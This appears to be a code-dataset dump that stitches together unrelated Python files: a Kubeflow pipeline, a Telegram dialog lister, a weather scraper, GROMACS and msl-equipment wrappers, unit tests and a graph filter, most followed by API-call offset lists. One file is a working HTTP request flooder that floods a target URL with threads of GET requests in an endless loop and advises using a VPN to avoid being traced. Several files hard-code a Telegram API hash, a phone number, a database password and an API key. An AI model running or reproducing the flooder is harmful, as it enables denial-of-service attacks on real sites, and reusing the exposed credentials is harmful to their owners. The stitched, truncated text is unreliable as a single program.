'testLabels':'/testLabelsObjectName.txt'
}
)
# Step 2: normalize data between 0 and 1
preprocess = dsl.ContainerOp(
name='preprocess',
# image needs to be a compile-time string
image='docker.io/dotnetderek/preprocess:latest',
arguments=[
download.outputs['trainImages'],
download.outputs['trainLabels'],
download.outputs['testImages'],
download.outputs['testLabels'],
download_and_preprocess
],
file_outputs={
'normalizedTrainImages':'/trainImagesObjectName.txt',
'normalizedTestImages':'/testImagesObjectName.txt'
}
)
# Step 3: train a model
train = dsl.ContainerOp(
name='train',
# image needs to be a compile-time string
image='docker.io/dotnetderek/train:latest',
arguments=[
preprocess.outputs['normalizedTrainImages'],
download.outputs['trainLabels']
],
file_outputs={
'trainedModelName':'/trainedModelName.txt'
}
)
# Step 4: evaluate model
evaluate = dsl.ContainerOp(
name='evaluate',
# image needs to be a compile-time string
image='docker.io/dotnetderek/evaluate:latest',
arguments=[
preprocess.outputs['normalizedTestImages'],
download.outputs['testLabels'],
train.outputs['trainedModelName']
],
file_outputs={
}
)
if __name__ == '__main__':
import kfp.compiler as compiler
import sys
if len(sys.argv) != 2:
print("Usage: kfp_fashion_mnist pipeline-output-name")
sys.exit(-1)
filename = sys.argv[1]
compiler.Compiler().compile(train_and_deploy, filename)
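    # Illustrative invocation (assumed output name, not from the original code):
    #   python kfp_fashion_mnist.py fashion_mnist.tar.gz
    # The generated archive can then be uploaded through the Kubeflow Pipelines UI.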
|
[
"kfp.dsl.ContainerOp",
"kfp.dsl.pipeline",
"sys.exit",
"kfp.compiler.Compiler"
] |
[((193, 278), 'kfp.dsl.pipeline', 'dsl.pipeline', ([], {'name': '"""fashion mnist"""', 'description': '"""Train and Deploy Fashion MNIST"""'}), "(name='fashion mnist', description='Train and Deploy Fashion MNIST'\n )\n", (205, 278), True, 'import kfp.dsl as dsl\n'), ((400, 729), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""download"""', 'image': '"""docker.io/dotnetderek/download:latest"""', 'arguments': '[download_and_preprocess]', 'file_outputs': "{'trainImages': '/trainImagesObjectName.txt', 'trainLabels':\n '/trainLabelsObjectName.txt', 'testImages': '/testImagesObjectName.txt',\n 'testLabels': '/testLabelsObjectName.txt'}"}), "(name='download', image=\n 'docker.io/dotnetderek/download:latest', arguments=[\n download_and_preprocess], file_outputs={'trainImages':\n '/trainImagesObjectName.txt', 'trainLabels':\n '/trainLabelsObjectName.txt', 'testImages': '/testImagesObjectName.txt',\n 'testLabels': '/testLabelsObjectName.txt'})\n", (415, 729), True, 'import kfp.dsl as dsl\n'), ((871, 1267), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""preprocess"""', 'image': '"""docker.io/dotnetderek/preprocess:latest"""', 'arguments': "[download.outputs['trainImages'], download.outputs['trainLabels'], download\n .outputs['testImages'], download.outputs['testLabels'],\n download_and_preprocess]", 'file_outputs': "{'normalizedTrainImages': '/trainImagesObjectName.txt',\n 'normalizedTestImages': '/testImagesObjectName.txt'}"}), "(name='preprocess', image=\n 'docker.io/dotnetderek/preprocess:latest', arguments=[download.outputs[\n 'trainImages'], download.outputs['trainLabels'], download.outputs[\n 'testImages'], download.outputs['testLabels'], download_and_preprocess],\n file_outputs={'normalizedTrainImages': '/trainImagesObjectName.txt',\n 'normalizedTestImages': '/testImagesObjectName.txt'})\n", (886, 1267), True, 'import kfp.dsl as dsl\n'), ((1402, 1638), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""train"""', 'image': '"""docker.io/dotnetderek/train:latest"""', 'arguments': "[preprocess.outputs['normalizedTrainImages'], download.outputs['trainLabels']]", 'file_outputs': "{'trainedModelName': '/trainedModelName.txt'}"}), "(name='train', image='docker.io/dotnetderek/train:latest',\n arguments=[preprocess.outputs['normalizedTrainImages'], download.\n outputs['trainLabels']], file_outputs={'trainedModelName':\n '/trainedModelName.txt'})\n", (1417, 1638), True, 'import kfp.dsl as dsl\n'), ((1765, 1999), 'kfp.dsl.ContainerOp', 'dsl.ContainerOp', ([], {'name': '"""evaluate"""', 'image': '"""docker.io/dotnetderek/evaluate:latest"""', 'arguments': "[preprocess.outputs['normalizedTestImages'], download.outputs['testLabels'],\n train.outputs['trainedModelName']]", 'file_outputs': '{}'}), "(name='evaluate', image=\n 'docker.io/dotnetderek/evaluate:latest', arguments=[preprocess.outputs[\n 'normalizedTestImages'], download.outputs['testLabels'], train.outputs[\n 'trainedModelName']], file_outputs={})\n", (1780, 1999), True, 'import kfp.dsl as dsl\n'), ((2246, 2258), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (2254, 2258), False, 'import sys\n'), ((2289, 2308), 'kfp.compiler.Compiler', 'compiler.Compiler', ([], {}), '()\n', (2306, 2308), True, 'import kfp.compiler as compiler\n')]
|
import pymongo
from pymongo import MongoClient
connection = MongoClient()
#client = MongoClient('localhost', 27017)
#The client object is thread-safe and has connection-pooling built in. If an operation fails because of a network error, ConnectionFailure is raised and the client reconnects in the background. Application code should handle this exception (recognizing that the operation failed) and then continue to execute.
# connect to the students database and the ctec121 collection
#db = connection.students.ctec121
db = connection.napp
collection = db.users
collection.find_one({"name":"name1"})
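# Illustrative follow-up (assumed document shape; not in the original script):
# collection.insert_one({"name": "name1", "score": 42})
# print(collection.find_one({"name": "name1"}))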
|
[
"pymongo.MongoClient"
] |
[((61, 74), 'pymongo.MongoClient', 'MongoClient', ([], {}), '()\n', (72, 74), False, 'from pymongo import MongoClient\n')]
|
from telethon.sync import TelegramClient
from telethon.sessions import StringSession
from pprint import pprint
import os
api_id = 628127
api_hash = 'db7fa09d585d6eedddd0df5973f3239b'
phone = '+8801817184338'
client = TelegramClient(phone, api_id, api_hash)
client.connect()
if not client.is_user_authorized():
client.send_code_request(phone)
client.sign_in(phone, input('Enter the code: '))
async def main():
st = ""
async for dialog in client.iter_dialogs():
try:
st1 = str(dialog.id)
st2 = st1[0]
            if st2 == '-':  # negative dialog ids denote groups/channels
st = st + "\n" + str(dialog.id) + ',' + str(dialog.name)
except:
pass
return st
def wrt_content(st):
try:
file = os.getcwd() + "//omgroup//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
except:
file = os.getcwd() + "//omgrp.txt"
fl = open(file, "w+", encoding="utf-8")
fl.write(st)
fl.close()
return file
def client_run():
with client:
sx = client.loop.run_until_complete(main())
fl = wrt_content(sx)
return fl
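# Illustrative usage (not in the original script): client_run() writes one
# "<id>,<name>" line per group/channel dialog and returns the output file path.
#
#     path = client_run()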
|
[
"os.getcwd",
"telethon.sync.TelegramClient"
] |
[((218, 257), 'telethon.sync.TelegramClient', 'TelegramClient', (['phone', 'api_id', 'api_hash'], {}), '(phone, api_id, api_hash)\n', (232, 257), False, 'from telethon.sync import TelegramClient\n'), ((747, 758), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (756, 758), False, 'import os\n'), ((899, 910), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (908, 910), False, 'import os\n')]
|
#!/usr/bin/python3
import requests, threading, os, readline, optparse
from colorama import Fore
read = optparse.OptionParser()
read.add_option('-u', '--url',help="Enter Website url", dest='url')
(value, key) = read.parse_args()
url = value.url
if url is None:
print("Coded by: <NAME>")
print("github: https://github.com/abalesluke")
print("Note: i am no longer responsible for any misuse of this tool!.")
print("\nTip: before executing this code you can also use -u flag\neg.[python3 reqflood.py -u <url>]")
print("You must Use vpn when using this!, cuz this version doesnt use proxy\n")
url = input('Enter url: ')
else:
pass
count = 0
def flood():
try:
header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"}
for x in range(100):
r = requests.get(url, headers=header)
global count
count+=1
print(f'{Fore.GREEN}[{Fore.CYAN}{count}{Fore.GREEN}] {Fore.CYAN}request/s sent to: {Fore.GREEN}{url} [{Fore.MAGENTA}{r.status_code}{Fore.GREEN}]')
except KeyboardInterrupt:
exit(0)
except:
pass
threads = []
while True:
for i in range(100):
x = threading.Thread(target=flood)
x.daemon = True
threads.append(x)
for i in range(100):
threads[i].start()
for i in range(100):
threads[i].join()
|
[
"requests.get",
"threading.Thread",
"optparse.OptionParser"
] |
[((104, 127), 'optparse.OptionParser', 'optparse.OptionParser', ([], {}), '()\n', (125, 127), False, 'import requests, threading, os, readline, optparse\n'), ((1158, 1188), 'threading.Thread', 'threading.Thread', ([], {'target': 'flood'}), '(target=flood)\n', (1174, 1188), False, 'import requests, threading, os, readline, optparse\n'), ((839, 872), 'requests.get', 'requests.get', (['url'], {'headers': 'header'}), '(url, headers=header)\n', (851, 872), False, 'import requests, threading, os, readline, optparse\n')]
|
import json
import requests
from sqlalchemy import Column, Integer, String, Float, Boolean
from pprint import pprint
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from base_file import Base
import time
import datetime
import traceback  # needed by the exception handler in getWeatherData()
class Weather(Base):
"""
Create a Weather table
"""
__tablename__ = 'weather1'
    id = Column(Integer, nullable=False, primary_key=True)
    name = Column(String(100), nullable=False)
    humidity = Column(Integer, nullable=False)
    temp = Column(Integer, nullable=False)
    temp_max = Column(Integer, nullable=False)
    temp_min = Column(Integer, nullable=False)
    description = Column(String(100), nullable=False)
    icon = Column(String(100), nullable=False)
    main_description = Column(String(100), nullable=False)
    timeDate = Column(String(100), primary_key=True, nullable=False)
def getWeatherData(self):
weather_engine = create_engine('mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes', convert_unicode=True)
Session = sessionmaker(bind=weather_engine)
talk_session = Session()
Base.metadata.create_all(bind=weather_engine)
while True:
try:
STATIONS_URI = "api.openweathermap.org/data/2.5/weather?"
api_url = 'http://api.openweathermap.org/data/2.5/weather'
appid = "033bc70c21f56a4af381b76c18f81458"
r = requests.get(url=api_url, params=dict(q='Dublin', APPID=appid))
#pprint(r)
data = r.json()
#pprint(data)
self.writeToDatabase(weather_engine,talk_session,data)
time.sleep(30*60)
except:
if weather_engine is None:
print(traceback.format_exc())
talk_session.close()
return
def writeToDatabase(self, weather_engine, talk_session, data):
self.data = data
now = datetime.datetime.now()
weather = Weather(id=self.data["id"],
name=self.data["name"],
humidity=self.data["main"]["humidity"],
temp_max=self.data["main"]["temp_max"],
temp_min=self.data["main"]["temp_min"],
temp=self.data["main"]["temp"],
description=self.data["weather"][0]["description"],
icon=self.data["weather"][0]["icon"],
main_description=self.data["weather"][0]["main"],
timeDate=now)
talk_session.add(weather)
talk_session.commit()
return
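# Illustrative usage sketch (not part of the original module; assumes the RDS
# instance above is reachable and the `weather1` table may be created):
#
#     Weather().getWeatherData()   # polls OpenWeatherMap every 30 minutes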
|
[
"base_file.Base.metadata.create_all",
"datetime.datetime.now",
"time.sleep",
"sqlalchemy.Column",
"sqlalchemy.String",
"sqlalchemy.orm.sessionmaker",
"sqlalchemy.create_engine"
] |
[((375, 426), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)', 'primary_key': '"""True"""'}), "(Integer, nullable=False, primary_key='True')\n", (381, 426), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((492, 523), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (498, 523), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((537, 568), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (543, 568), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((584, 615), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (590, 615), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((631, 662), 'sqlalchemy.Column', 'Column', (['Integer'], {'nullable': '(False)'}), '(Integer, nullable=False)\n', (637, 662), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((446, 457), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (452, 457), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((688, 699), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (694, 699), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((737, 748), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (743, 748), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((798, 809), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (804, 809), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((851, 862), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (857, 862), False, 'from sqlalchemy import Column, Integer, String, Float, Boolean\n'), ((972, 1129), 'sqlalchemy.create_engine', 'create_engine', (['"""mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes"""'], {'convert_unicode': '(True)'}), "(\n 'mysql+mysqlconnector://CGSdatabase:password@dublinbikes.ctaptplk7c5t.eu-west-1.rds.amazonaws.com/dublinbikes'\n , convert_unicode=True)\n", (985, 1129), False, 'from sqlalchemy import create_engine\n'), ((1139, 1172), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', ([], {'bind': 'weather_engine'}), '(bind=weather_engine)\n', (1151, 1172), False, 'from sqlalchemy.orm import scoped_session, sessionmaker\n'), ((1214, 1259), 'base_file.Base.metadata.create_all', 'Base.metadata.create_all', ([], {'bind': 'weather_engine'}), '(bind=weather_engine)\n', (1238, 1259), False, 'from base_file import Base\n'), ((2116, 2139), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (2137, 2139), False, 'import datetime\n'), ((1798, 1817), 'time.sleep', 'time.sleep', (['(30 * 60)'], {}), '(30 * 60)\n', (1808, 1817), False, 'import time\n')]
|
#! /usr/bin/env python3
"""
Unittests for the CSD module
"""
import unittest
import pycsd.csd as csd
good_values_dict = {
32: '+00000',
-32: '-00000',
0: '0',
7: '+00-',
15: '+000-'
}
class tests__integers(unittest.TestCase):
def test__01_to_integer(self):
""" Check conversion from CSD to integer """
for key in good_values_dict.keys():
csd_str = good_values_dict[key]
value = csd.to_decimal(csd_str)
self.assertEqual(value, key)
def test__02_to_csd(self):
""" Check that integers are converted to CSD properly. """
for key in good_values_dict.keys():
csd_str = csd.to_csd(key)
self.assertEqual(csd_str, good_values_dict[key])
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(tests__integers))
return suite
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"unittest.TestSuite",
"unittest.makeSuite",
"pycsd.csd.to_csd",
"pycsd.csd.to_decimal"
] |
[((784, 804), 'unittest.TestSuite', 'unittest.TestSuite', ([], {}), '()\n', (802, 804), False, 'import unittest\n'), ((910, 925), 'unittest.main', 'unittest.main', ([], {}), '()\n', (923, 925), False, 'import unittest\n'), ((823, 858), 'unittest.makeSuite', 'unittest.makeSuite', (['tests__integers'], {}), '(tests__integers)\n', (841, 858), False, 'import unittest\n'), ((449, 472), 'pycsd.csd.to_decimal', 'csd.to_decimal', (['csd_str'], {}), '(csd_str)\n', (463, 472), True, 'import pycsd.csd as csd\n'), ((680, 695), 'pycsd.csd.to_csd', 'csd.to_csd', (['key'], {}), '(key)\n', (690, 695), True, 'import pycsd.csd as csd\n')]
|
"""
Load an XML :ref:`configuration_file`.
"""
import os
import logging
from xml.etree import cElementTree as ET
from .database import Database
logger = logging.getLogger(__name__)
class Config(object):
PyVISA_LIBRARY = '@ni'
""":class:`str`: The PyVISA backend_ library to use.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
"""
DEMO_MODE = False
""":class:`bool`: Whether to open connections in demo mode.
The equipment does not need to be physically connected to a computer.
"""
PATH = []
""":class:`list` of :class:`str`: Paths are also appended to :data:`os.environ['PATH'] <os.environ>`."""
def __init__(self, path):
"""Load an XML :ref:`configuration_file`.
This function is used to set the configuration constants to use for the Python runtime
and it allows you to access :class:`.EquipmentRecord`'s from an :ref:`equipment_database`
and :class:`.ConnectionRecord`'s from a :ref:`connections_database`.
**MSL-Equipment** constants that can be defined in a :ref:`configuration_file`:
+----------------+-----------------------------------+-----------------------------------------+
| Name | Example Values | Description |
+================+===================================+=========================================+
| pyvisa_library | @ni, @py, @sim, /path/to/lib\@ni | The PyVISA backend_ library to use. |
+----------------+-----------------------------------+-----------------------------------------+
| demo_mode | true, false | Whether to open connections in demo |
| | | mode. |
+----------------+-----------------------------------+-----------------------------------------+
| path | /path/to/SDKs, D:/images | A path that contains external resources.|
| | | Accepts a *recursive="true"* attribute. |
| | | Appends the path(s) to |
| | | :data:`os.environ['PATH'] <os.environ>` |
| | | and to :attr:`.PATH` |
+----------------+-----------------------------------+-----------------------------------------+
Also, the user is encouraged to define their own application-specific constants within the
configuration file.
.. _backend: https://pyvisa.readthedocs.io/en/stable/backends.html
Parameters
----------
path : :class:`str`
The path to an XML :ref:`configuration_file`.
Raises
------
IOError
If `path` does not exist or if the :ref:`configuration_file` is invalid.
"""
logger.debug('Loading {}'.format(path))
try:
self._root = ET.parse(path).getroot()
parse_err = ''
except ET.ParseError as err:
parse_err = str(err)
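        # raising outside the except block keeps the IOError from chaining
        # the original ParseError into its traceback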
if parse_err:
raise IOError(parse_err)
self._path = path
self._database = None
element = self._root.find('pyvisa_library')
if element is not None:
Config.PyVISA_LIBRARY = element.text
logger.debug('update Config.PyVISA_LIBRARY = {}'.format(Config.PyVISA_LIBRARY))
element = self._root.find('demo_mode')
if element is not None:
Config.DEMO_MODE = element.text.lower() == 'true'
logger.debug('update Config.DEMO_MODE = {}'.format(Config.DEMO_MODE))
for element in self._root.findall('path'):
if not os.path.isdir(element.text):
logger.warning('Not a valid PATH ' + element.text)
continue
if element.attrib.get('recursive', 'false').lower() == 'true':
for root, dirs, files in os.walk(element.text):
Config.PATH.append(root)
else:
Config.PATH.append(element.text)
for p in Config.PATH:
os.environ['PATH'] += os.pathsep + p
logger.debug('append Config.PATH %s', p)
@property
def path(self):
""":class:`str`: The path to the configuration file."""
return self._path
@property
def root(self):
"""Returns the root element (the first node) of the XML tree.
Returns
-------
:class:`~xml.etree.ElementTree.Element`
The root element.
"""
return self._root
def database(self):
"""
Returns
-------
:class:`~.database.Database`
A reference to the equipment and connection records in the database(s)
that are specified in the configuration file.
"""
if self._database is None:
self._database = Database(self._path)
return self._database
def value(self, tag):
"""Gets the value associated with the specified `tag` in the configuration file.
Parameters
----------
tag : :class:`str`
The name of a XML tag in the configuration file.
Returns
-------
:class:`str` or :data:`None`
The value associated with the `tag` or :data:`None` if the tag cannot be found.
"""
element = self._root.find(tag)
if element is not None:
return element.text
return None
|
[
"os.path.isdir",
"xml.etree.cElementTree.parse",
"os.walk",
"logging.getLogger"
] |
[((155, 182), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (172, 182), False, 'import logging\n'), ((3906, 3933), 'os.path.isdir', 'os.path.isdir', (['element.text'], {}), '(element.text)\n', (3919, 3933), False, 'import os\n'), ((4143, 4164), 'os.walk', 'os.walk', (['element.text'], {}), '(element.text)\n', (4150, 4164), False, 'import os\n'), ((3146, 3160), 'xml.etree.cElementTree.parse', 'ET.parse', (['path'], {}), '(path)\n', (3154, 3160), True, 'from xml.etree import cElementTree as ET\n')]
|
#!/usr/bin/env python
"""Python wrapper module for the GROMACS genrestr module
"""
import sys
import re
import json
import os
import configuration.settings as settings
from command_wrapper import cmd_wrapper
from tools import file_utils as fu
class Genrestr(object):
"""Wrapper class for the GROMACS genrestr module.
Args:
input_structure_path (str): Path to the input structure PDB/GRO/TPR file.
input_ndx_path (str): Path to the input index NDX file.
        input_top_zip_path (str): Path to the input TOP topology in zip format.
        output_top_zip_path (str): Path to the output TOP topology in zip format.
properties (dic):
            | **output_top_path** (*str*): Path to the output TOP file.
| **output_itp_path** (*str*): Path to the output include for topology ITP file.
| **force_constants** (*float[3]*): Array of three floats defining the force constants
"""
def __init__(self, input_structure_path, input_ndx_path, input_top_zip_path,
output_top_zip_path, properties, **kwargs):
        if isinstance(properties, str):
            properties = json.loads(properties)
self.input_structure_path = input_structure_path
self.input_ndx_path = input_ndx_path
self.input_top_zip_path = input_top_zip_path
self.output_top_zip_path = output_top_zip_path
self.output_itp_path = properties.get('output_itp_path','restrain.itp')
self.output_top_path = properties.get('output_top_path','restrain.top')
self.force_constants = properties.get('force_constants','500 500 500')
self.restricted_group = properties.get('restricted_group', 'system')
self.gmx_path = properties.get('gmx_path',None)
self.mutation = properties.get('mutation',None)
self.step = properties.get('step',None)
self.path = properties.get('path','')
self.mpirun = properties.get('mpirun',False)
self.mpirun_np = properties.get('mpirun_np',None)
def launch(self):
"""Launches the execution of the GROMACS pdb2gmx module.
"""
out_log, err_log = fu.get_logs(path=self.path, mutation=self.mutation, step=self.step)
self.output_top_path = fu.add_step_mutation_path_to_name(self.output_top_path, self.step, self.mutation)
self.output_itp_path = fu.add_step_mutation_path_to_name(self.output_itp_path, self.step, self.mutation)
gmx = "gmx" if self.gmx_path is None else self.gmx_path
cmd = [gmx, "genrestr", "-f", self.input_structure_path,
"-n", self.input_ndx_path, "-o", self.output_itp_path,
"-fc", self.force_constants]
if self.mpirun_np is not None:
cmd.insert(0, str(self.mpirun_np))
cmd.insert(0, '-np')
if self.mpirun:
cmd.insert(0, 'mpirun')
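        # feed the restricted group name to gmx genrestr on stdin: a
        # here-string under mpirun, otherwise piped in from echo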
if self.mpirun:
cmd.append('<<<')
cmd.append('\"'+self.restricted_group+'\"')
else:
cmd.insert(0, '|')
cmd.insert(0, '\"'+self.restricted_group+'\"')
cmd.insert(0, 'echo')
command = cmd_wrapper.CmdWrapper(cmd, out_log, err_log)
returncode = command.launch()
fu.unzip_top(zip_file=self.input_top_zip_path, top_file=self.output_top_path)
out_log.info('Unzip: '+ self.input_top_zip_path + ' to: '+self.output_top_path)
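        # find the include file referenced inside the '#ifdef POSRES' block
        # of the unzipped topology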
with open(self.output_top_path, 'r') as fin:
for line in fin:
if line.startswith('#ifdef POSRES'):
                    itp_name = re.findall('"([^"]*)"', next(fin))[0]
out_log.debug('itp_name: '+itp_name)
break
# with open(self.output_top_path, 'r') as fin:
# data = fin.read().splitlines(True)
# index = data.index('#ifdef POSRES\n')
# data[index+2] = 'system\n'
# data.insert(index, '\n')
# data.insert(index, '#endif\n')
# data.insert(index, '#include "'+self.output_itp_path+'"\n')
# data.insert(index, '#ifdef CUSTOM_POSRES\n')
# data.insert(index, '; Include Position restraint file\n')
# # data.insert(index, '#include "'+self.output_itp_path+'"\n')
# # data.insert(index, '; Include genrestr generated itp\n')
# with open(self.output_top_path, 'w') as fout:
# fout.writelines(data)
with open(self.output_itp_path, 'r') as fin:
data = fin.read().splitlines(True)
# data.insert(0, '\n')
# data.insert(0, 'system 3\n')
# data.insert(0, ';Name nrexcl\n')
# data.insert(0, '[ system ]\n')
with open(itp_name, 'w') as fout:
fout.writelines(data)
os.remove(self.output_itp_path)
# zip topology
fu.zip_top(self.output_top_path, self.output_top_zip_path, remove_files=False)
out_log.info('Zip: '+ self.output_top_path +' to: '+ self.output_top_zip_path)
return returncode
#Creating a main function to be compatible with CWL
def main():
system=sys.argv[1]
step=sys.argv[2]
properties_file=sys.argv[3]
prop = settings.YamlReader(properties_file, system).get_prop_dic()[step]
    Genrestr(input_structure_path=sys.argv[4],
             input_ndx_path=sys.argv[5],
             input_top_zip_path=sys.argv[6],
             output_top_zip_path=sys.argv[7],
             properties=prop).launch()
if __name__ == '__main__':
main()
|
[
"os.remove",
"tools.file_utils.zip_top",
"tools.file_utils.add_step_mutation_path_to_name",
"json.loads",
"command_wrapper.cmd_wrapper.CmdWrapper",
"tools.file_utils.get_logs",
"tools.file_utils.unzip_top",
"configuration.settings.YamlReader"
] |
[((2138, 2205), 'tools.file_utils.get_logs', 'fu.get_logs', ([], {'path': 'self.path', 'mutation': 'self.mutation', 'step': 'self.step'}), '(path=self.path, mutation=self.mutation, step=self.step)\n', (2149, 2205), True, 'from tools import file_utils as fu\n'), ((2237, 2323), 'tools.file_utils.add_step_mutation_path_to_name', 'fu.add_step_mutation_path_to_name', (['self.output_top_path', 'self.step', 'self.mutation'], {}), '(self.output_top_path, self.step, self.\n mutation)\n', (2270, 2323), True, 'from tools import file_utils as fu\n'), ((2350, 2436), 'tools.file_utils.add_step_mutation_path_to_name', 'fu.add_step_mutation_path_to_name', (['self.output_itp_path', 'self.step', 'self.mutation'], {}), '(self.output_itp_path, self.step, self.\n mutation)\n', (2383, 2436), True, 'from tools import file_utils as fu\n'), ((3124, 3169), 'command_wrapper.cmd_wrapper.CmdWrapper', 'cmd_wrapper.CmdWrapper', (['cmd', 'out_log', 'err_log'], {}), '(cmd, out_log, err_log)\n', (3146, 3169), False, 'from command_wrapper import cmd_wrapper\n'), ((3217, 3294), 'tools.file_utils.unzip_top', 'fu.unzip_top', ([], {'zip_file': 'self.input_top_zip_path', 'top_file': 'self.output_top_path'}), '(zip_file=self.input_top_zip_path, top_file=self.output_top_path)\n', (3229, 3294), True, 'from tools import file_utils as fu\n'), ((4759, 4790), 'os.remove', 'os.remove', (['self.output_itp_path'], {}), '(self.output_itp_path)\n', (4768, 4790), False, 'import os\n'), ((4824, 4902), 'tools.file_utils.zip_top', 'fu.zip_top', (['self.output_top_path', 'self.output_top_zip_path'], {'remove_files': '(False)'}), '(self.output_top_path, self.output_top_zip_path, remove_files=False)\n', (4834, 4902), True, 'from tools import file_utils as fu\n'), ((1145, 1167), 'json.loads', 'json.loads', (['properties'], {}), '(properties)\n', (1155, 1167), False, 'import json\n'), ((5168, 5212), 'configuration.settings.YamlReader', 'settings.YamlReader', (['properties_file', 'system'], {}), '(properties_file, system)\n', (5187, 5212), True, 'import configuration.settings as settings\n')]
|
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter
import cost_claimer.routing
import cost_claimer.consumers
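# websocket connections pass through Django's auth middleware; the background
# worker consumes messages routed to the "user_action" channel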
application = ProtocolTypeRouter({
'websocket': AuthMiddlewareStack(
URLRouter(
cost_claimer.routing.websocket_urlpatterns
)
),
"channel": ChannelNameRouter({
"user_action": cost_claimer.consumers.GroupCostWorker,
}),
})
|
[
"channels.routing.ChannelNameRouter",
"channels.routing.URLRouter"
] |
[((363, 437), 'channels.routing.ChannelNameRouter', 'ChannelNameRouter', (["{'user_action': cost_claimer.consumers.GroupCostWorker}"], {}), "({'user_action': cost_claimer.consumers.GroupCostWorker})\n", (380, 437), False, 'from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n'), ((265, 318), 'channels.routing.URLRouter', 'URLRouter', (['cost_claimer.routing.websocket_urlpatterns'], {}), '(cost_claimer.routing.websocket_urlpatterns)\n', (274, 318), False, 'from channels.routing import ProtocolTypeRouter, URLRouter, ChannelNameRouter\n')]
|
# -*- coding: utf-8 -*-
"""
Filter the directed and undirected people-interaction graphs by node degree
and export the filtered graphs as GEXF files and pickles.
"""
import pandas as pd
import numpy as np
import seaborn as sns
import mysql.connector
from sqlalchemy import create_engine
import nltk
import re
from nltk.corpus import stopwords
import string
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
from nltk.stem import SnowballStemmer
import pickle
import itertools
import networkx as nx
import time
from datetime import datetime, timedelta, date
from timeit import default_timer as timer
from sys import argv
db_name_table = 'PostsMadCar'#str(argv[1])
#db_name_table = 'PostsCorMad'#str(argv[1])
db2='UsersMadCar'#str(argv[1])
#db2='UsersCorMad'#str(argv[1])
datapath='/home/davidpastor/Narrativas/MadCar/'
#datapath='/home/davidpastor/Narrativas/CorMad/'
tag=''
th=10
start=timer()
path_graphs = 'People/'
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'.cnf', 'rb') as handle:
Gu=pickle.load(handle)
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'.cnf', 'rb') as handle:
G=pickle.load(handle)
with open(datapath+path_graphs+db2+'People'+tag+'.cnf', 'rb') as handle:
People=pickle.load(handle)
Gu.remove_node('None')
G.remove_node('None')
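# degree distribution of the undirected graph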
nu=Gu.nodes()
vu=[]
gudata=Gu.nodes.data()
for n in nu:
vu.append(Gu.degree(n))
print(len(vu))
vuc = [i for i in vu if i > th]
print(len(vuc))
sns.set_style('darkgrid')
sns_plot = sns.distplot(vu)
sns_plot.figure.savefig("Gu_nodehist.png")
ns=G.nodes()
v=[]
gdata=G.nodes.data()
for n in ns:
v.append(G.out_degree(n))
print(len(v))
vc = [i for i in v if i > th]
print(len(vc))
v2=[]
for n in ns:
v2.append(G.in_degree(n))
print(len(v2))
vc2 = [i for i in v2 if i > th]
print(len(vc2))
sns.set_style('darkgrid')
sns_plot = sns.distplot(v)
sns_plot.figure.savefig("G_nodehist.png")
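# drop nodes below the degree threshold th from copies of both graphs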
Guf=Gu.copy()
nus=Gu.nodes()
for n in nus:
dn=Gu.degree(n)
if dn<th:
Guf.remove_node(n)
Gf=G.copy()
ns=G.nodes()
for n in ns:
dn=G.out_degree(n)
if dn<th:
Gf.remove_node(n)
print(len(Guf.nodes()))
print(len(Gf.nodes()))
path_graphs = 'People/'
nx.write_gexf(Guf, datapath+path_graphs+db_name_table+'NetworkGraphPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetPeople'+tag+'_f.cnf', 'wb') as handle:
pickle.dump(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)
nx.write_gexf(Gf, datapath+path_graphs+db_name_table+'NetworkGraphDPeople'+tag+'_f.gexf')
with open(datapath+path_graphs+db_name_table+'NetDPeople'+tag+'_f.cnf', 'wb') as handle:
